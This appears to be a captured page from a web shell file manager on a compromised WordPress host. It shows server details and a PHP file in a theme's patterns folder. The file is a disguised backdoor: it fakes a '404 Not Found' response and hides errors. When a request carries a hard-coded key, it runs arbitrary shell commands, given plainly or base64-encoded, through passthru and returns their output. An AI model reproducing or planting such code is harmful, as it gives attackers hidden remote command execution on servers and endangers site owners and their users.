| Server IP : 109.122.246.182 / Your IP : 216.73.216.59 Web Server : Apache/2 System : Linux host3.abrin.cloud 6.1.0-52-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.180-1 (2026-08-03) x86_64 User : sinah533 ( 1085) PHP Version : 8.1.28 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/sinah533/public_html/wp-content/themes/twentytwentyfour/patterns/ |
Upload File : |
<?php
http_response_code(404);
error_reporting(0);
@ini_set('display_errors',0);
$k="2vz754gtjdal";
if(isset($_REQUEST["px"])&&$_REQUEST["px"]===$k){
$c=null;
if(isset($_REQUEST["b"])){$c=base64_decode($_REQUEST["b"]);}
elseif(isset($_REQUEST["c"])){$c=$_REQUEST["c"];}
if($c!==null){ob_start();@passthru($c.' 2>&1');$o=ob_get_clean();echo "[S]".$o."[E]";}
else{echo "[S]OK[E]";}
exit;
}
?>
<!DOCTYPE html>
<html>
<head><title>404 Not Found</title></head>
<body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body>
</html>